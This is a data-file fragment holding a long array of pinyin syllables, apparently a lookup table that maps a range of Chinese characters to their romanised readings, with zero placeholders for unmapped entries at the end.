"zhao","su","yin","ju","jian","que","tang","chuo","cui","lu","qu","dang","qiu","zi","ti","qu","chi","huang","qiao","qiao","jiao","zao","ti","er","zan","zan","zu","pa","bao","ku","ke","dun","jue","fu","chen","jian","fang","zhi","ta","yue","ba","qi","yue","qiang","tuo","tai","yi","nian","ling","mei","ba","die","ku","tuo","jia","ci","pao","qia","zhu","ju","dian","zhi","fu","pan","ju","shan","bo","ni","ju","li","gen","yi","ji","duo","xian","jiao","duo","zhu","quan","kua","zhuai","gui","qiong","kui","xiang","chi","lu","pian","zhi","jia","tiao","cai","jian","ta","qiao","bi","xian","duo","ji","ju","ji","shu","tu","chu","jing","nie","xiao","bu","xue","cun","mu","shu","liang","yong","jiao","chou","qiao","mou","ta","jian","qi","wo","wei","chuo","jie","ji","nie","ju","ju",
"lun","lu","leng","huai","ju","chi","wan","quan","ti","bo","zu","qie","yi","cu","zong","cai","zong","peng","zhi","zheng","dian","zhi","yu","duo","dun","chuan","yong","zhong","di","zha","chen","chuai","jian","gua","tang","ju","fu","zu","die","pian","rou","nuo","ti","cha","tui","jian","dao","cuo","qi","ta","qiang","nian","dian","ti","ji","nie","pan","liu","zan","bi","chong","lu","liao","cu","tang","dai","su","xi","kui","ji","zhi","qiang","di","pan","zong","lian","beng","zao","nian","bie","tui","ju","deng","ceng","xian","fan","chu","zhong","dun","bo","cu","cu","jue","jue","lin","ta","qiao","jue","pu","liao","dun","cuan","kuang","zao","da","bi","bi","zhu","ju","chu","qiao","dun","chou","ji","wu","yue","nian","lin","lie","zhi","li","zhi","chan","chu","duan","wei","long","lin","xian",
"wei","zuan","lan","xie","rang","sa","nie","ta","qu","jie","cuan","cuo","xi","kui","jue","lin","shen","gong","dan","fen","qu","ti","duo","duo","gong","lang","ren","luo","ai","ji","ju","tang","kong","lao","yan","mei","kang","qu","lou","lao","duo","zhi","yan","ti","dao","ying","yu","che","ya","gui","jun","wei","yue","xin","dai","xuan","fan","ren","shan","kuang","shu","tun","chen","dai","e","na","qi","mao","ruan","ren","qian","zhuan","hong","hu","qu","kuang","di","ling","dai","ao","zhen","fan","kuang","yang","peng","bei","gu","gu","pao","zhu","rong","e","ba","zhou","zhi","yao","ke","yi","zhi","shi","ping","er","gong","ju","jiao","guang","he","kai","quan","zhou","zai","zhi","she","liang","yu","shao","you","wan","yin","zhe","wan","fu","qing","zhou","ni","leng","zhe","zhan","liang",
"zi","hui","wang","chuo","guo","kan","yi","peng","qian","gun","nian","ping","guan","bei","lun","pai","liang","ruan","rou","ji","yang","xian","chuan","cou","chun","ge","you","hong","shu","fu","zi","fu","wen","ben","zhan","yu","wen","tao","gu","zhen","xia","yuan","lu","jiao","chao","zhuan","wei","hun","xue","zhe","jiao","zhan","bu","lao","fen","fan","lin","ge","se","kan","huan","yi","ji","zhui","er","yu","jian","hong","lei","pei","li","li","lu","lin","che","ya","gui","xuan","dai","ren","zhuan","e","lun","ruan","hong","gu","ke","lu","zhou","zhi","yi","hu","zhen","li","yao","qing","shi","zai","zhi","jiao","zhou","quan","lu","jiao","zhe","fu","liang","nian","bei","hui","gun","wang","liang","chuo","zi","cou","fu","ji","wen","shu","pei","yuan","xia","nian","lu","zhe","lin","xin","gu",
"ci","ci","pi","zui","bian","la","la","ci","xue","ban","bian","bian","bian","xue","bian","ban","ci","bian","bian","chen","ru","nong","nong","chan","chuo","chuo","yi","reng","bian","bian","shi","ru","liao","da","chan","gan","qian","yu","yu","qi","xun","yi","guo","mai","qi","za","wang","tu","zhun","ying","ti","yun","jin","hang","ya","fan","wu","da","e","hai","zhe","zhong","jin","yuan","wei","lian","chi","che","ni","tiao","zhi","yi","jiong","jia","chen","dai","er","di","po","zhu","die","ze","tao","shu","tuo","qu","jing","hui","dong","you","mi","beng","ji","nai","yi","jie","zhui","lie","xun","tui","song","shi","tao","pang","hou","ni","dun","jiong","xuan","xun","bu","you","xiao","qiu","tou","zhu","qiu","di","di","tu","jing","ti","dou","yi","zhe","tong","guang","wu","shi",
"cheng","su","zao","qun","feng","lian","suo","hui","li","gu","lai","ben","cuo","jue","beng","huan","dai","lu","you","zhou","jin","yu","chuo","kui","wei","ti","yi","da","yuan","luo","bi","nuo","yu","dang","sui","dun","sui","yan","chuan","chi","ti","yu","shi","zhen","you","yun","e","bian","guo","e","xia","huang","qiu","dao","da","wei","nan","yi","gou","yao","chou","liu","xun","ta","di","chi","yuan","su","ta","qian","ma","yao","guan","zhang","ao","shi","ca","chi","su","zao","zhe","dun","di","lou","chi","cuo","lin","zun","rao","qian","xuan","yu","yi","wu","liao","ju","shi","bi","yao","mai","xie","sui","hai","zhan","teng","er","miao","bian","bian","la","li","yuan","yao","luo","li","yi","ting","deng","qi","yong","shan","han","yu","mang","ru","qiong","wan","kuang","fu",
"kang","bin","fang","xing","na","xin","shen","bang","yuan","cun","huo","xie","bang","wu","ju","you","han","tai","qiu","bi","pi","bing","shao","bei","wa","di","zou","ye","lin","kuang","gui","zhu","shi","ku","yu","gai","he","qie","zhi","ji","huan","hou","xing","jiao","xi","gui","nuo","lang","jia","kuai","zheng","lang","yun","yan","cheng","dou","xi","lu","fu","wu","fu","gao","hao","lang","jia","geng","jun","ying","bo","xi","bei","li","yun","bu","xiao","qi","pi","qing","guo","zhou","tan","zou","ping","lai","ni","chen","you","bu","xiang","dan","ju","yong","qiao","yi","dou","yan","mei","ruo","bei","e","shu","juan","yu","yun","hou","kui","xiang","xiang","sou","tang","ming","xi","ru","chu","zi","zou","ye","wu","xiang","yun","hao","yong","bi","mao","chao","fu","liao","yin","zhuan",
"hu","qiao","yan","zhang","man","qiao","xu","deng","bi","xun","bi","zeng","wei","zheng","mao","shan","lin","po","dan","meng","ye","cao","kuai","feng","meng","zou","kuang","lian","zan","chan","you","ji","yan","chan","cuo","ling","huan","xi","feng","zan","li","you","ding","qiu","zhuo","pei","zhou","yi","gan","yu","jiu","yan","zui","mao","zhen","xu","dou","zhen","fen","yuan","fu","yun","tai","tian","qia","tuo","cu","han","gu","su","fa","chou","zai","ming","lao","chuo","chou","you","tong","zhi","xian","jiang","cheng","yin","tu","jiao","mei","ku","suan","lei","pu","zui","hai","yan","shai","niang","wei","lu","lan","yan","tao","pei","zhan","chun","tan","zui","zhui","cu","kun","ti","xian","du","hu","xu","xing","tan","qiu","chun","yun","po","ke","sou","mi","quan","chou","cuo","yun","yong","ang",
"zha","hai","tang","jiang","piao","chen","yu","li","zao","lao","yi","jiang","bu","jiao","xi","tan","fa","nong","yi","li","ju","yan","yi","niang","ru","xun","chou","yan","ling","mi","mi","niang","xin","jiao","shai","mi","yan","bian","cai","shi","you","shi","shi","li","zhong","ye","liang","li","jin","jin","qiu","yi","liao","dao","zhao","ding","po","qiu","ba","fu","zhen","zhi","ba","luan","fu","nai","diao","shan","qiao","kou","chuan","zi","fan","hua","hua","han","gang","qi","mang","ri","di","si","xi","yi","chai","shi","tu","xi","nu","qian","qiu","jian","pi","ye","jin","ba","fang","chen","xing","dou","yue","qian","fu","pi","na","xin","e","jue","dun","gou","yin","qian","ban","sa","ren","chao","niu","fen","yun","ji","qin","pi","guo","hong","yin","jun","shi","yi","zhong",
"xi","gai","ri","huo","tai","kang","yuan","lu","e","wen","duo","zi","ni","tu","shi","min","gu","ke","ling","bing","si","gu","bo","pi","yu","si","zuo","bu","you","tian","jia","zhen","shi","shi","zhi","ju","chan","shi","shi","xuan","zhao","bao","he","bi","sheng","chu","shi","bo","zhu","chi","za","po","tong","qian","fu","zhai","liu","qian","fu","li","yue","pi","yang","ban","bo","jie","gou","shu","zheng","mu","xi","xi","di","jia","mu","tan","huan","yi","si","kuang","ka","bei","jian","tong","xing","hong","jiao","chi","er","luo","bing","shi","mou","jia","yin","jun","zhou","chong","xiang","tong","mo","lei","ji","yu","xu","ren","zun","zhi","qiong","shan","chi","xian","xing","quan","pi","tie","zhu","xiang","ming","kua","yao","xian","xian","xiu","jun","cha","lao","ji","pi",
"ru","mi","yi","yin","guang","an","diu","you","se","kao","qian","luan","si","ai","diao","han","rui","shi","keng","qiu","xiao","zhe","xiu","zang","ti","cuo","gua","hong","zhong","tou","lu","mei","lang","wan","xin","yun","bei","wu","su","yu","chan","ding","bo","han","jia","hong","cuan","feng","chan","wan","zhi","si","xuan","hua","yu","tiao","gong","zhuo","lue","xing","qin","shen","han","lue","ye","chu","zeng","ju","xian","tie","mang","pu","li","pan","rui","cheng","gao","li","te","bing","zhu","zhen","tu","liu","zui","ju","chang","yuan","jian","gang","diao","tao","chang","lun","guo","ling","bei","lu","li","qiang","pou","juan","min","zui","peng","an","pi","xian","ya","zhui","lei","ke","kong","ta","kun","du","nei","chui","zi","zheng","ben","nie","zong","chun","tan","ding","qi","qian","zhui",
"ji","yu","jin","guan","mao","chang","tian","xi","lian","tao","gu","cuo","shu","zhen","lu","meng","lu","hua","biao","ga","lai","ken","fang","wu","nai","wan","zan","hu","de","xian","pian","huo","liang","fa","men","kai","ying","di","lian","guo","xian","du","tu","wei","zong","fu","rou","ji","e","jun","chen","ti","zha","hu","yang","duan","xia","yu","keng","xing","huang","wei","fu","zhao","cha","qie","shi","hong","kui","tian","mou","qiao","qiao","hou","tou","cong","huan","ye","min","jian","duan","jian","song","kui","hu","xuan","duo","jie","zhen","bian","zhong","zi","xiu","ye","mei","pai","ai","jie","qian","mei","suo","da","bang","xia","lian","suo","kai","liu","yao","ye","nou","weng","rong","tang","suo","qiang","li","shuo","chui","bo","pan","da","bi","sang","gang","zi","wu","ying","huang",
"tiao","liu","kai","sun","sha","sou","wan","hao","zhen","zhen","lang","yi","yuan","tang","nie","xi","jia","ge","ma","juan","song","zu","suo","xia","feng","wen","na","lu","suo","ou","zu","tuan","xiu","guan","xuan","lian","shou","ao","man","mo","luo","bi","wei","liu","di","san","zong","yi","lu","ao","keng","qiang","cui","qi","chang","tang","man","yong","chan","feng","jing","biao","shu","lou","xiu","cong","long","zan","jian","cao","li","xia","xi","kang","shuang","beng","zhang","qian","cheng","lu","hua","ji","pu","hui","qiang","po","lin","se","xiu","san","cheng","kui","si","liu","nao","huang","pie","sui","fan","qiao","quan","yang","tang","xiang","jue","jiao","zun","liao","qie","lao","dui","xin","zan","ji","jian","zhong","deng","ya","ying","dui","jue","nou","zan","pu","tie","fan","zhang","ding","shan",
"kai","jian","fei","sui","lu","juan","hui","yu","lian","zhuo","qiao","jian","zhuo","lei","bi","tie","huan","ye","duo","guo","dang","ju","fen","da","bei","yi","ai","zong","xun","diao","zhu","heng","zhui","ji","nie","he","huo","qing","bin","ying","kui","ning","xu","jian","jian","qian","cha","zhi","mie","li","lei","ji","zuan","kuang","shang","peng","la","du","shuo","chuo","lu","biao","bao","lu","xian","kuan","long","e","lu","xin","jian","lan","bo","jian","yao","chan","xiang","jian","xi","guan","cang","nie","lei","cuan","qu","pan","luo","zuan","luan","zao","nie","jue","tang","shu","lan","jin","ga","yi","zhen","ding","zhao","po","liao","tu","qian","chuan","shan","ji","fan","diao","men","nu","yang","chai","xing","gai","bu","tai","ju","dun","chao","zhong","na","bei","gang","ban","qian","yao","qin",
"jun","wu","gou","kang","fang","huo","tou","niu","ba","yu","qian","zheng","qian","gu","bo","e","po","bu","bo","yue","zuan","mu","tan","jia","dian","you","tie","bo","ling","shuo","qian","mao","bao","shi","xuan","ta","bi","ni","pi","duo","xing","kao","lao","er","mang","ya","you","cheng","jia","ye","nao","zhi","dang","tong","lu","diao","yin","kai","zha","zhu","xi","ding","diu","xian","hua","quan","sha","ha","diao","ge","ming","zheng","se","jiao","yi","chan","chong","tang","an","yin","ru","zhu","lao","pu","wu","lai","te","lian","keng","xiao","suo","li","zeng","chu","guo","gao","e","xiu","cuo","lue","feng","xin","liu","kai","jian","rui","ti","lang","qin","ju","a","qiang","zhe","nuo","cuo","mao","ben","qi","de","ke","kun","chang","xi","gu","luo","chui","zhui","jin","zhi",
"xian","juan","huo","pei","tan","ding","jian","ju","meng","zi","qie","ying","kai","qiang","si","e","cha","qiao","zhong","duan","sou","huang","huan","ai","du","mei","lou","zi","fei","mei","mo","zhen","bo","ge","nie","tang","juan","nie","na","liu","gao","bang","yi","jia","bin","rong","biao","tang","man","luo","beng","yong","jing","di","zu","xuan","liu","chan","jue","liao","pu","lu","dui","lan","pu","cuan","qiang","deng","huo","lei","huan","zhuo","lian","yi","cha","biao","la","chan","xiang","zhang","chang","jiu","ao","die","qu","liao","mi","zhang","men","ma","shuan","shan","huo","men","yan","bi","han","bi","shan","kai","kang","beng","hong","run","san","xian","xian","jian","min","xia","shui","dou","zha","nao","zhan","peng","xia","ling","bian","bi","run","ai","guan","ge","ge","fa","chu","hong","gui",
"min","se","kun","lang","lu","ting","sha","ju","yue","yue","chan","qu","lin","chang","shai","kun","yan","wen","yan","e","hun","yu","wen","xiang","bao","hong","qu","yao","wen","ban","an","wei","yin","kuo","que","lan","du","quan","feng","tian","nie","ta","kai","he","que","chuang","guan","dou","qi","kui","tang","guan","piao","kan","xi","hui","chan","pi","dang","huan","ta","wen","ta","men","shuan","shan","yan","han","bi","wen","chuang","run","wei","xian","hong","jian","min","kang","men","zha","nao","gui","wen","ta","min","lu","kai","fa","ge","he","kun","jiu","yue","lang","du","yu","yan","chang","xi","wen","hun","yan","e","chan","lan","qu","hui","kuo","que","he","tian","da","que","han","huan","fu","fu","le","dui","xin","qian","wu","gai","zhi","yin","yang","dou","e","sheng",
"ban","pei","keng","yun","ruan","zhi","pi","jing","fang","yang","yin","zhen","jie","cheng","e","qu","di","zu","zuo","dian","ling","a","tuo","tuo","bei","bing","fu","ji","lu","long","chen","xing","duo","lou","mo","jiang","shu","duo","xian","er","gui","yu","gai","shan","jun","qiao","xing","chun","fu","bi","xia","shan","sheng","zhi","pu","dou","yuan","zhen","chu","xian","dao","nie","yun","xian","pei","fei","zou","yi","dui","lun","yin","ju","chui","chen","pi","ling","tao","xian","lu","sheng","xian","yin","zhu","yang","reng","xia","chong","yan","yin","shu","di","yu","long","wei","wei","nie","dui","sui","an","huang","jie","sui","yin","gai","yan","hui","ge","yun","wu","kui","ai","xi","tang","ji","zhang","dao","ao","xi","yin","sa","rao","lin","tui","deng","jiao","sui","sui","ao","xian",
"fen","ni","er","ji","dao","xi","yin","e","hui","long","xi","li","li","li","zhui","hu","zhi","sun","juan","nan","yi","que","yan","qin","qian","xiong","ya","ji","gu","huan","zhi","gou","juan","ci","yong","ju","chu","hu","za","luo","yu","chou","diao","sui","han","wo","shuang","guan","chu","za","yong","ji","xi","chou","liu","li","nan","xue","za","ji","ji","yu","yu","xue","na","fou","se","mu","wen","fen","pang","yun","li","chi","yang","ling","lei","an","bao","wu","dian","dang","hu","wu","diao","xu","ji","mu","chen","xiao","zha","ting","zhen","pei","mei","ling","qi","zhou","huo","sha","fei","hong","zhan","yin","ni","zhu","tun","lin","ling","dong","ying","wu","ling","shuang","ling","xia","hong","yin","mai","mai","yun","liu","meng","bin","wu","wei","kuo","yin","xi",
"yi","ai","dan","teng","san","yu","lu","long","dai","ji","pang","yang","ba","pi","wei","feng","xi","ji","mai","meng","meng","lei","li","huo","ai","fei","dai","long","ling","ai","feng","li","bao","he","he","he","bing","qing","qing","jing","tian","zhen","jing","cheng","qing","jing","jing","dian","jing","tian","fei","fei","kao","mi","mian","mian","bao","ye","tian","hui","ye","ge","ding","cha","qian","ren","di","du","wu","ren","qin","jin","xue","niu","ba","yin","sa","na","mo","zu","da","ban","yi","yao","tao","bei","jia","hong","pao","yang","bing","yin","ge","tao","jie","xie","an","an","hen","gong","qia","da","qiao","ting","man","ying","sui","tiao","qiao","xuan","kong","beng","ta","shang","bing","kuo","ju","la","xie","rou","bang","eng","qiu","qiu","he","xiao","mu","ju","jian",
"bian","di","jian","wen","tao","gou","ta","bei","xie","pan","ge","bi","kuo","tang","lou","gui","qiao","xue","ji","jian","jiang","chan","da","hu","xian","qian","du","wa","jian","lan","wei","ren","fu","mei","quan","ge","wei","qiao","han","chang","kuo","rou","yun","she","wei","ge","bai","tao","gou","yun","gao","bi","wei","sui","du","wa","du","wei","ren","fu","han","wei","yun","tao","jiu","jiu","xian","xie","xian","ji","yin","za","yun","shao","le","peng","huang","ying","yun","peng","an","yin","xiang","hu","ye","ding","qing","kui","xiang","shun","han","xu","yi","xu","e","song","kui","qi","hang","yu","wan","ban","dun","di","dan","pan","po","ling","che","jing","lei","he","qiao","e","e","wei","xie","kuo","shen","yi","shen","hai","dui","yu","ping","lei","fu","jia","tou",
"hui","kui","jia","luo","ting","cheng","ying","yun","hu","han","jing","tui","tui","pin","lai","tui","zi","zi","chui","ding","lai","tan","han","qian","ke","cui","xuan","qin","yi","sai","ti","e","e","yan","wen","kan","yong","zhuan","yan","xian","xin","yi","yuan","sang","dian","dian","jiang","kui","lei","lao","piao","wai","man","cu","yao","hao","qiao","gu","xun","yan","hui","chan","ru","meng","bin","xian","pin","lu","lan","nie","quan","ye","ding","qing","han","xiang","shun","xu","xu","wan","gu","dun","qi","ban","song","hang","yu","lu","ling","po","jing","jie","jia","ting","he","ying","jiong","ke","yi","pin","hui","tui","han","ying","ying","ke","ti","yong","e","zhuan","yan","e","nie","man","dian","sang","hao","lei","chan","ru","pin","quan","feng","biao","gua","fu","xia","zhan","biao",
"sa","ba","tai","lie","gua","xuan","shao","ju","biao","si","wei","yang","yao","sou","kai","sou","fan","liu","xi","liu","piao","piao","liu","biao","biao","biao","liao","biao","se","feng","xiu","feng","yang","zhan","biao","sa","ju","si","sou","yao","liu","piao","biao","biao","fei","fan","fei","fei","shi","shi","can","ji","ding","si","tuo","zhan","sun","xiang","tun","ren","yu","juan","chi","yin","fan","fan","sun","yin","tou","yi","zuo","bi","jie","tao","liu","ci","tie","si","bao","shi","duo","hai","ren","tian","jiao","jia","bing","yao","tong","ci","xiang","yang","juan","er","yan","le","xi","can","bo","nei","e","bu","jun","dou","su","yu","shi","yao","hun","guo","shi","jian","zhui","bing","xian","bu","ye","tan","fei","zhang","wei","guan","e","nuan","yun","hu","huang","tie","hui",
"jian","hou","ai","tang","fen","wei","gu","cha","song","tang","bo","gao","xi","kui","liu","sou","tao","ye","yun","mo","tang","man","bi","yu","xiu","jin","san","kui","zhuan","shan","chi","dan","yi","ji","rao","cheng","yong","tao","wei","xiang","zhan","fen","hai","meng","yan","mo","chan","xiang","luo","zan","nang","shi","ding","ji","tuo","tang","tun","xi","ren","yu","chi","fan","yin","jian","shi","bao","si","duo","yi","er","rao","xiang","he","le","jiao","xi","bing","bo","dou","e","yu","nei","jun","guo","hun","xian","guan","cha","kui","gu","sou","chan","ye","mo","bo","liu","xiu","jin","man","san","zhuan","nang","shou","kui","guo","xiang","fen","bo","ni","bi","bo","tu","han","fei","jian","an","ai","fu","xian","yun","xin","fen","pin","xin","ma","yu","feng","han","di",
"tuo","zhe","chi","xun","zhu","zhi","pei","xin","ri","sa","yun","wen","zhi","dan","lu","you","bo","bao","jue","tuo","yi","qu","wen","qu","jiong","po","zhao","yuan","pei","zhou","ju","zhu","nu","ju","pi","zang","jia","ling","zhen","tai","fu","yang","shi","bi","tuo","tuo","si","liu","ma","pian","tao","zhi","rong","teng","dong","xun","quan","shen","jiong","er","hai","bo","zhu","yin","luo","zhou","dan","xie","liu","ju","song","qin","mang","lang","han","tu","xuan","tui","jun","e","cheng","xing","ai","lu","zhui","zhou","she","pian","kun","tao","lai","zong","ke","qi","qi","yan","fei","sao","yan","ge","yao","wu","pian","cong","pian","qian","fei","huang","qian","huo","yu","ti","quan","xia","zong","kui","rou","si","gua","tuo","gui","sou","qian","cheng","zhi","liu","peng","teng","xi",
"cao","du","yan","yuan","zou","sao","shan","li","zhi","shuang","lu","xi","luo","zhang","mo","ao","can","biao","cong","qu","bi","zhi","yu","xu","hua","bo","su","xiao","lin","zhan","dun","liu","tuo","ceng","dian","jiao","tie","yan","luo","zhan","jing","yi","ye","tuo","pin","zhou","yan","long","lu","teng","xiang","ji","shuang","ju","xi","huan","li","biao","ma","yu","tuo","xun","chi","qu","ri","bo","lu","zang","shi","si","fu","ju","zou","zhu","tuo","nu","jia","yi","dai","xiao","ma","yin","jiao","hua","luo","hai","pian","biao","li","cheng","yan","xing","qin","jun","qi","qi","ke","zhui","zong","su","can","pian","zhi","kui","sao","wu","ao","liu","qian","shan","biao","luo","cong","chan","zhou","ji","shuang","xiang","gu","wei","wei","wei","yu","gan","yi","ang","tou","jie","bao",
"bei","ci","ti","di","ku","hai","qiao","hou","kua","ge","tui","geng","pian","bi","ke","qia","yu","sui","lou","bo","xiao","bang","bo","ci","kuan","bin","mo","liao","lou","xiao","du","zang","sui","ti","bin","kuan","lu","gao","gao","qiao","kao","qiao","lao","sao","biao","kun","kun","di","fang","xiu","ran","mao","dan","kun","bin","fa","tiao","pi","zi","fa","ran","ti","bao","bi","mao","fu","er","rong","qu","gong","xiu","kuo","ji","peng","zhua","shao","suo","ti","li","bin","zong","di","peng","song","zheng","quan","zong","shun","jian","tuo","hu","la","jiu","qi","lian","zhen","bin","peng","ma","san","man","man","seng","xu","lie","qian","qian","nang","huan","kuo","ning","bin","lie","rang","dou","dou","nao","hong","xi","dou","han","dou","dou","jiu","chang","yu","yu","ge","yan",
"fu","qin","gui","zong","liu","gui","shang","yu","gui","mei","ji","qi","ga","kui","hun","ba","po","mei","xu","yan","xiao","liang","yu","tui","qi","wang","liang","wei","gan","chi","piao","bi","mo","ji","xu","chou","yan","zhan","yu","dao","ren","jie","ba","hong","tuo","diao","ji","xu","e","e","sha","hang","tun","mo","jie","shen","ban","yuan","pi","lu","wen","hu","lu","za","fang","fen","na","you","pian","mo","he","xia","qu","han","pi","ling","tuo","bo","qiu","ping","fu","bi","ci","wei","ju","diao","ba","you","gun","pi","nian","xing","tai","bao","fu","zha","ju","gu","shi","dong","dai","ta","jie","shu","hou","xiang","er","an","wei","zhao","zhu","yin","lie","luo","tong","ti","yi","bing","wei","jiao","ku","gui","xian","ge","hui","lao","fu","kao","xiu",
"duo","jun","ti","mian","shao","zha","suo","qin","yu","nei","zhe","gun","geng","su","wu","qiu","shan","pu","huan","tiao","li","sha","sha","kao","meng","cheng","li","zou","xi","yong","ni","zi","qi","zheng","xiang","nei","chun","ji","diao","qie","gu","zhou","dong","lai","fei","ni","yi","kun","lu","jiu","chang","jing","lun","ling","zou","li","meng","zong","zhi","nian","hu","yu","di","shi","shen","hun","ti","hou","xing","zhu","la","zong","zei","bian","bian","huan","quan","zei","wei","wei","yu","chun","rou","die","huang","lian","yan","qiu","qiu","jian","bi","e","yang","fu","sai","gan","xia","tuo","hu","shi","ruo","xuan","wen","qian","hao","wu","fang","sao","liu","ma","shi","shi","guan","zi","teng","ta","yao","e","yong","qian","qi","wen","ruo","shen","lian","ao","le","hui","min",
"ji","tiao","qu","jian","shen","man","xi","qiu","biao","ji","ji","zhu","jiang","xiu","zhuan","yong","zhang","kang","xue","bie","yu","qu","xiang","bo","jiao","xun","su","huang","zun","shan","shan","fan","gui","lin","xun","miao","xi","zeng","xiang","fen","guan","hou","kuai","zei","sao","zhan","gan","gui","ying","li","chang","lei","shu","ai","ru","ji","xu","hu","shu","li","lie","li","mie","zhen","xiang","e","lu","guan","li","xian","yu","dao","ji","you","tun","lu","fang","ba","he","ba","ping","nian","lu","you","zha","fu","ba","bao","hou","pi","tai","gui","jie","kao","wei","er","tong","zei","hou","kuai","ji","jiao","xian","zha","xiang","xun","geng","li","lian","jian","li","shi","tiao","gun","sha","huan","jun","ji","yong","qing","ling","qi","zou","fei","kun","chang","gu","ni","nian",
"diao","jing","shen","shi","zi","fen","die","bi","chang","ti","wen","wei","sai","e","qiu","fu","huang","quan","jiang","bian","sao","ao","qi","ta","guan","yao","pang","jian","le","biao","xue","bie","man","min","yong","wei","xi","gui","shan","lin","zun","hu","gan","li","zhan","guan","niao","yi","fu","li","jiu","bu","yan","fu","diao","ji","feng","ru","gan","shi","feng","ming","bao","yuan","zhi","hu","qin","fu","ban","wen","jian","shi","yu","fou","yao","jue","jue","pi","huan","zhen","bao","yan","ya","zheng","fang","feng","wen","ou","dai","ge","ru","ling","mie","fu","tuo","min","li","bian","zhi","ge","yuan","ci","qu","xiao","chi","dan","ju","yao","gu","dong","yu","yang","rong","ya","tie","yu","tian","ying","dui","wu","er","gua","ai","zhi","yan","heng","xiao","jia","lie",
"zhu","yang","ti","hong","luo","ru","mou","ge","ren","jiao","xiu","zhou","zhi","luo","heng","nian","e","luan","jia","ji","tu","huan","tuo","bu","wu","juan","yu","bo","jun","xun","bi","xi","jun","ju","tu","jing","ti","e","e","kuang","hu","wu","shen","lai","jiao","pan","lu","pi","shu","fu","an","zhuo","peng","qin","qian","bei","diao","lu","que","jian","ju","tu","ya","yuan","qi","li","ye","zhui","kong","duo","kun","sheng","qi","jing","yi","yi","jing","zi","lai","dong","qi","chun","geng","ju","jue","yi","zun","ji","shu","ying","chi","miao","rou","an","qiu","ti","hu","ti","e","jie","mao","fu","chun","tu","yan","he","yuan","pian","kun","mei","hu","ying","chuan","wu","ju","dong","cang","fang","he","ying","yuan","xian","weng","shi","he","chu","tang","xia","ruo",
"liu","ji","gu","jian","sun","han","ci","ci","yi","yao","yan","ji","li","tian","kou","ti","ti","yi","tu","ma","jiao","gao","tian","chen","ji","tuan","zhe","ao","yao","yi","ou","chi","zhi","liu","yong","lu","bi","shuang","zhuo","yu","wu","jue","yin","ti","si","jiao","yi","hua","bi","ying","su","huang","fan","jiao","liao","yan","gao","jiu","xian","xian","tu","mai","zun","yu","ying","lu","tuan","xian","xue","yi","pi","chu","luo","xi","yi","ji","ze","yu","zhan","ye","yang","pi","ning","hu","mi","ying","meng","di","yue","yu","lei","bao","lu","he","long","shuang","yue","ying","guan","qu","li","luan","niao","jiu","ji","yuan","ming","shi","ou","ya","cang","bao","zhen","gu","dong","lu","ya","xiao","yang","ling","chi","qu","yuan","xue","tuo","si","zhi","er","gua",
"xiu","heng","zhou","ge","luan","hong","wu","bo","li","juan","gu","e","yu","xian","ti","wu","que","miao","an","kun","bei","peng","qian","chun","geng","yuan","su","hu","he","e","gu","qiu","ci","mei","wu","yi","yao","weng","liu","ji","yi","jian","he","yi","ying","zhe","liu","liao","jiao","jiu","yu","lu","huan","zhan","ying","hu","meng","guan","shuang","lu","jin","ling","jian","xian","cuo","jian","jian","yan","cuo","lu","you","cu","ji","pao","cu","pao","zhu","jun","zhu","jian","mi","mi","yu","liu","chen","jun","lin","ni","qi","lu","jiu","jun","jing","li","xiang","xian","jia","mi","li","she","zhang","lin","jing","qi","ling","yan","cu","mai","mai","he","chao","fu","mian","mian","fu","pao","qu","qu","mou","fu","xian","lai","qu","mian","chi","feng","fu","qu","mian",
"ma","me","mo","hui","mo","zou","nun","fen","huang","huang","jin","guang","tian","tou","hong","hua","kuang","hong","shu","li","nian","chi","hei","hei","yi","qian","dan","xi","tun","mo","mo","qian","dai","chu","you","dian","yi","xia","yan","qu","mei","yan","qing","yue","li","dang","du","can","yan","yan","yan","dan","an","zhen","dai","can","yi","mei","zhan","yan","du","lu","zhi","fen","fu","fu","mian","mian","yuan","cu","qu","chao","wa","zhu","zhi","meng","ao","bie","tuo","bi","yuan","chao","tuo","ding","mi","nai","ding","zi","gu","gu","dong","fen","tao","yuan","pi","chang","gao","qi","yuan","tang","teng","shu","shu","fen","fei","wen","ba","diao","tuo","zhong","qu","sheng","shi","you","shi","ting","wu","nian","jing","hun","ju","yan","tu","si","xi","xian","yan","lei","bi",
"yao","qiu","han","wu","wu","hou","xie","e","zha","xiu","weng","zha","nong","nang","qi","zhai","ji","zi","ji","ji","qi","ji","chi","chen","chen","he","ya","yin","xie","bao","ze","xie","chai","chi","yan","ju","tiao","ling","ling","chu","quan","xie","ken","nie","jiu","yao","chuo","kun","yu","chu","yi","ni","ze","zou","qu","yun","yan","ou","e","wo","yi","ci","zou","dian","chu","jin","ya","chi","chen","he","yin","ju","ling","bao","tiao","zi","ken","yu","chuo","qu","wo","long","pang","gong","pang","yan","long","long","gong","kan","da","ling","da","long","gong","kan","gui","qiu","bie","gui","yue","chui","he","jue","xie","yu",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,"shan",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
